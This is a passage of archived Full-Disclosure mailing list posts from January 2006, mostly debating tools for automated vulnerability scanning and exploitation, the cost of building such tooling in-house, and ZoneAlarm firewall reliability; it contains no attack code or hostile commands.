to look the other way. It's a little harder for it to tell a hardware firewall to look the other way. Unless of course, the firewall implements the UPnP Pants Down! RPC.. ;) Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Startup company
Yes, and shares/ownership. -Adriel -Original Message- From: Dude VanWinkle [EMAIL PROTECTED] To: Shyaam [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 05:45:53 -0500 Subject: Re: [Full-disclosure] Startup company On 1/17/06, Shyaam [EMAIL PROTECTED] wrote: Hello All, My friend is starting a new company for providing Anti-reversing security and related to forensics. Can someone give some tips and guidance. If you are involved in this foray into Anti-reversing make sure your friend gives you a signed contract :-) -Dude ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question for the Windows pros
--On Thursday, January 19, 2006 18:54:29 +0100 Jerome Athias [EMAIL PROTECTED] wrote: Applying the Principle of Least Privilege to User Accounts on Windows XP http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/luawinxp.m spx I fully understand the principle of least privilege to users. I'm not sure how it applies to my question, though. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Madison, See, thats the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the higest. Never the less, automation can only be used a limited amount as it reduces quality and accuracy I know this. -Adriel -Original Message- From: Madison, Marc [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 08:02:59 -0600 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools I've looked at BidiBLAH (enfaces on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in a easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside Of the reporting? Their answer, well let's just say I'm still waiting. My two cent, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market. H D Moore wrote: Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit: - http://www.sensepost.com/research/bidiblah/ The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable. -HD On Tuesday 17 January 2006 18:04, H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Again... cheaper than core impact... but not free... -Adriel -Original Message- From: Madison, Marc [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 08:13:05 -0600 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools H D, my apologize. My FD emails were out of order, and I took your response out of context. If your looking for a script that will combine MetaSploit, and Nessus then BidiBLAH will work. Still for $10 grand I would suggest taking a scripting class at your local college so you can make your own BidiBlah. Math: BidiBLAH: $10,000 College scripting class: $350 The knowledge you'll gain for ever, priceless. I've looked at BidiBLAH (enfaces on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in a easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside Of the reporting? Their answer, well let's just say I'm still waiting. My two cent, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market. H D Moore wrote: Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit: - http://www.sensepost.com/research/bidiblah/ The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re[2]: [Full-disclosure] Vulnerability/Penetration Testing Tools
Dear Marc, gac Math: gac BidiBLAH: $10,000 The quote you got is obviously lower then the one we received... -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Alright, I've made an observation. Full Disclosure is a list where emails and subjects evolve into new emails and subjects which are not directly related to the first subject or email. For example, this one has evolved into a discussion about overhead, development and other such things. Really, its quite interesting. ;[ -Adriel -Original Message- From: [EMAIL PROTECTED] To: Madison, Marc [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 12:14:24 -0500 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools On Wed, 18 Jan 2006 08:13:05 CST, Madison, Marc said: H D, my apologize. My FD emails were out of order, and I took your response out of context. If your looking for a script that will combine MetaSploit, and Nessus then BidiBLAH will work. Still for $10 grand I would suggest taking a scripting class at your local college so you can make your own BidiBlah. Math: BidiBLAH: $10,000 College scripting class: $350 The knowledge you'll gain for ever, priceless. Something to keep in mind however - many people make that comparison, and don't calculate the *TOTAL* cost. If your developer is getting paid $60K/year, the *encumbered* cost (benefits, office, etc) is close to twice that. And if he's writing an in-house BidiBLAh, that's time he's *not* writing stuff you *can't* buy off-the-shelf. As a result, it breaks out as: BidiBLAH: $10,000 scripting clss: $350 6 man-weeks time: $15,000 OK? Got that? Suddenly doesn't look like such a good deal, does it? Maybe you *should* just buy BidiBLAH, and have that guy coding that custom interface between two in-house systems instead (And don't say I only pay my developer $30K, so he can take 2 man-months to do it - the kind of developer you can keep for $30K is probably going to take a lot more than twice as long as the $60K developer.) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Dre, Awesome! Thank you!! -Adriel -Original Message- From: Andre Ludwig [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 13:26:54 -0500 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools http://autoscan.free.fr/index.html Used to do nessus, nmap, and metasploit via the scripting menu.. Havent toyed with it in a long while so you may want to check it out and verify it still does all of that. video of it in action here http://eks0.free.fr/whax-demos/?f=autoscan-metasploit_config.xml Dre On 1/18/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Wed, 18 Jan 2006 11:36:04 CST, Madison, Marc said: Developer $60K/year divided by the adopted 2080 man hours year (this is the average hours work, 40 hour week, 5 days, etc...) = $28.85/hourly, That's the *unencumbered* cost. Now add in the employer cost of health insurance (probably close to $400 or more a month), FICA Medicare, Social Security, workman's comp, pension plan - right there that's another 25% in addition to that $28.85. Now he's costing you $35/hour. And we're not done yet Then add in the cost of his office - if he has a 10x10 cubicle, and commercial space rents for $10/square foot/mo, that's another $12,000/year. Now add in electricity, the cost of administrative assistants and HR people to support it (unless it's a *small* shop and doesn't have assistants and HR), and so on. Oh, and if you buy him a new $3,000 workstation every third year, that's another $1K/year. This shit adds up. That's why the rule of thumb is the real cost of a technical hire is twice the salary... Like you said, many people make that comparison, and don't calculate the *TOTAL* cost. That's what I said..;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
use core-Impact. 'nuff said :-) - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 1:27 PM Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools Madison, See, thats the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the higest. Never the less, automation can only be used a limited amount as it reduces quality and accuracy I know this. -Adriel -Original Message- From: Madison, Marc [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 08:02:59 -0600 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools I've looked at BidiBLAH (enfaces on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in a easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside Of the reporting? Their answer, well let's just say I'm still waiting. My two cent, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market. H D Moore wrote: Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit: - http://www.sensepost.com/research/bidiblah/ The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable. -HD On Tuesday 17 January 2006 18:04, H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Again... cheaper than core impact... but not free... Get your employer to reimburse the purchase of a bunch of O'Riley books from Amazon and learn Perl/Python yourself. It's amazing how fast the brain absorbs information when you're sufficiently motivated. Nessus is easily scriptable, and with what's on CPAN, it's trivial to get nessus data into MySQL and report against it. Integration with Metaspolit is also trivial (as Metasploit modules are all in Perl). Remember the old addage ... teach a man to fish ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
$$$ ... but its startin to look that way... -Adriel -Original Message- From: Exibar [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thu, 19 Jan 2006 13:49:49 -0500 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools use core-Impact. 'nuff said :-) - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 1:27 PM Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools Madison, See, thats the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the higest. Never the less, automation can only be used a limited amount as it reduces quality and accuracy I know this. -Adriel -Original Message- From: Madison, Marc [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 08:02:59 -0600 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools I've looked at BidiBLAH (enfaces on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in a easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside Of the reporting? Their answer, well let's just say I'm still waiting. My two cent, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market. H D Moore wrote: Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit: - http://www.sensepost.com/research/bidiblah/ The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable. -HD On Tuesday 17 January 2006 18:04, H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
or learn how to do such tests by hand as that is more accurate as any automated tool out there! a penetration test shouldnt be automated it would miss too many bugs i.e. in custom php/cgi scripts. a professional security audit can only be done by hand. period. too many people rip their customers off with cheap automated tests. -sk http://www.groundzero-security.com - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 7:27 PM Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools Madison, See, thats the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the higest. Never the less, automation can only be used a limited amount as it reduces quality and accuracy I know this. -Adriel -Original Message- From: Madison, Marc [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 08:02:59 -0600 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools I've looked at BidiBLAH (enfaces on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in a easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside Of the reporting? Their answer, well let's just say I'm still waiting. My two cent, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market. H D Moore wrote: Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit: - http://www.sensepost.com/research/bidiblah/ The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable. -HD On Tuesday 17 January 2006 18:04, H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Sk, I couldn't agree more. Nothing beats real results from real people. Having said that, the time to deliver can be reduced by using automated tools for reconnaissance. If automated scanners identify vulnerabilities in systems then those same services do not need to be fully re-evaluated. That means less work, more savings passed to the client. -Adriel -Original Message- From: GroundZero Security [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Thu, 19 Jan 2006 20:00:30 +0100 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools or learn how to do such tests by hand as that is more accurate as any automated tool out there! a penetration test shouldnt be automated it would miss too many bugs i.e. in custom php/cgi scripts. a professional security audit can only be done by hand. period. too many people rip their customers off with cheap automated tests. -sk http://www.groundzero-security.com - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 7:27 PM Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools Madison, See, thats the challenge. I am not looking for a tool that does strict vulnerability assessments. I am looking for a tool that will do an automated vulnerability assessment and then automated attacks against those vulnerabilities. Core Impact has such a tool and it is well worth the money. In fact, I already have that in my to-purchase list. I am now searching for free tools however and haven't found anything. My goal is to identify tools that have a high ROI... free == the higest. Never the less, automation can only be used a limited amount as it reduces quality and accuracy I know this. -Adriel -Original Message- From: Madison, Marc [EMAIL PROTECTED] To: H D Moore [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 08:02:59 -0600 Subject: RE: [Full-disclosure] Vulnerability/Penetration Testing Tools I've looked at BidiBLAH (enfaces on the BLAH). Their product does nothing more than take the results from Nessus, Metasploit and such, then cram them all together in a easy to understand format for your boss. BidiBLAH IMHO is not a vulnerability assessment tool, rather a reporting tool. If anyone can correct me please do, since at one point I was in contact with BidiBLAH sales asking what I got for $10,000.00 outside Of the reporting? Their answer, well let's just say I'm still waiting. My two cent, Nessus. It's cheap, effective, and probably the most supported network vulnerability assessment tool on the market. H D Moore wrote: Er, woops, misread - you want to scan and automatically exploit systems. This can be easily done with a little scripting and the available open-source tools. SensePost has a project called BiDiBLAH that integrates Google-discovery, a TCP port scanner, Nessus, and Metasploit: - http://www.sensepost.com/research/bidiblah/ The next version of the Metasploit Framework (v3) has support for 'recon' modules that technically you could use to automate this, but it will take some time before this is usable. -HD On Tuesday 17 January 2006 18:04, H D Moore wrote: You should check out the Metasploit Framework: - http://metasploit.com/projects/Framework/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
Alright, I am well aware of the glory of self education but am still interested in learning what tools exist to date that do this type of automated work. -Adriel -Original Message- From: Michael Holstein [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thu, 19 Jan 2006 13:57:10 -0500 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools Again... cheaper than core impact... but not free... Get your employer to reimburse the purchase of a bunch of O'Riley books from Amazon and learn Perl/Python yourself. It's amazing how fast the brain absorbs information when you're sufficiently motivated. Nessus is easily scriptable, and with what's on CPAN, it's trivial to get nessus data into MySQL and report against it. Integration with Metaspolit is also trivial (as Metasploit modules are all in Perl). Remember the old addage ... teach a man to fish ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Re: PC Firewall Choices
Stan Bubrouski wrote in news:[EMAIL PROTECTED] On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: I'd like to second what Greg says. I've used ZA for years, through many changes of version. It's never forgotten its settings for me. It's never blocked anything it shouldn't or not blocked anything it should. Really? Do you just run notepad? I've had to remove it on several machines because it blocked the launch of certain applications despite there being no rules to do so. This includes (to my recollection this was some months ago) some popular tax software updating features, adobe acrobat plugin stoppped working within IE even though it was configured to, and numerous other problems that couldn't be tracked to any rules. I run a vast range of apps, including acrobat, and like I said, it's never broken anything for me. Actually, it's just occurred to me that I've only ever used the free version, and the pro version may have features in it that I haven't had a chance to use and are buggy. In which case I'd recommened upgrading to the free version. It's not remotely bloated compared to similar packages like anything Norton/Symantec/McAfee[*] Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when ZA is installed web browsing with IE is slowed down very noticably, far more than average Norton System Works install causes. But have you diagnosed this problem enough to show that ZA is at fault rather than anything else? Did you do a controled experiment? Did you take identical machines with identical setups and nothing different between them except ZA on one and Norton on the other and compare them at the same time? If you haven't done a controlled experiment, then your assumption that the different behaviours you have observed on two different systems is down to one particular one of the differences between those systems - the PFW software - rather than any of the many many other differences between those systems that you haven't even considered or analyzed - is simply an unproven and unjustified assertion. Nor do I find a dialog such as Should internet explorer be allowed to connect to the internet at all confusing. Neither does anyone else in this thread, you just presume we're all lusers who can't read english or configure simple software. I think you're reading too much into my words. I was expecting an answer along the lines of No, that's perfectly clear, but /this/ one is misleading/confusing/vague. Instead, you've merely repeated your unproven assumption one more time with still no evidence to back it up. So I'm convinced the problem exists between chair and keyboard. Your wild assumptions that because you've never had a problem that anyone who does must be an idiot is astounding...do you teach? No, but I'll try and teach you how not to make assumptions: Saying that the problem exists between chair and keyboard does not make any claim about the nature of that problem. Specifically, it does not imply that the user is an idiot. It implies nothing more than that the user did not operate the software correctly. The rest is something you imagined because you are overreacting emotively. Try using google you'll found thousands of ZA problems, not all imagined Well, I was actually asking _you_ to back up _your_ claims. You are the one making them, after all, so it should be for you to document or otherwise prove them. Can you actually back up your claims? For example, can you describe a simple procedure, that anyone with ZA installed could try out, that shows it to misbehave? Or do you have detailed notes that you took at the time one of these problems occurred that shows the symptoms you observed and the steps you took to attempt to diagnose and solve the problem? Having uninstalled it, deleted the executable, and wiped my free space. No. Or can we just expect to hear No, I didn't know what was going on, I didn't keep proper notes, I was in a rush and just needed to get things working so I didn't investigate? In which case it would be false to claim It's clearly the problem if it degrades system performance, some apps fail to load, and all this goes away when is disabled. And who the hell takes notes on every piece of software they install and remove because its buggy? Please we'd all have a set of encyclopedia-sized notes for Windows problems alone. As I have demonstrated above, not doing a controlled experiment means that your reasoning here is just an exercise in fallacious and dogmatic thinking. As to who takes notes on their processes and procedures, the answer is professionals who understand the value of documentation and repeatability. that you knew ZA to be the cause of the problem, rather than either pilot error or a faulty PC or any number of other confounding factors that could arise? It's easy to know, because when you uninstall it suddenly things
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools [AutoScan]
Ha! Funny to see a video demo of some code I've written. My alias is 'rastakid' and I wrote the metasploit plugin for AutoScan. It's basicly just a perlscript using the GTK2 libraries. AutoScan is a tool which makes it incredibly easy to call external applications with its scanresults as arguments (like IP addresses). Please note: AutoScan is not developed by me, only the Metasploit plugin. I was forced to stop development a couple of months ago because I got really busy with school and left my parent's house so I had no time to work on it anymore. I'm thinking about continuing development if I get more time and there's interest in it. - Vincent 'rastakid' van Scherpenseel [EMAIL PROTECTED] wrote: Dre, Awesome! Thank you!! -Adriel -Original Message- From: Andre Ludwig [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 13:26:54 -0500 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools http://autoscan.free.fr/index.html Used to do nessus, nmap, and metasploit via the scripting menu.. Havent toyed with it in a long while so you may want to check it out and verify it still does all of that. video of it in action here http://eks0.free.fr/whax-demos/?f=autoscan-metasploit_config.xml Dre On 1/18/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Wed, 18 Jan 2006 11:36:04 CST, Madison, Marc said: Developer $60K/year divided by the adopted 2080 man hours year (this is the average hours work, 40 hour week, 5 days, etc...) = $28.85/hourly, That's the *unencumbered* cost. Now add in the employer cost of health insurance (probably close to $400 or more a month), FICA Medicare, Social Security, workman's comp, pension plan - right there that's another 25% in addition to that $28.85. Now he's costing you $35/hour. And we're not done yet Then add in the cost of his office - if he has a 10x10 cubicle, and commercial space rents for $10/square foot/mo, that's another $12,000/year. Now add in electricity, the cost of administrative assistants and HR people to support it (unless it's a *small* shop and doesn't have assistants and HR), and so on. Oh, and if you buy him a new $3,000 workstation every third year, that's another $1K/year. This shit adds up. That's why the rule of thumb is the real cost of a technical hire is twice the salary... Like you said, many people make that comparison, and don't calculate the *TOTAL* cost. That's what I said..;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
i think the author of this advisory is desperate for advisories or attention. either way he needs to open a disassembler and work on something else. Pavel Kankovsky wrote: On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example ) What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure their is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
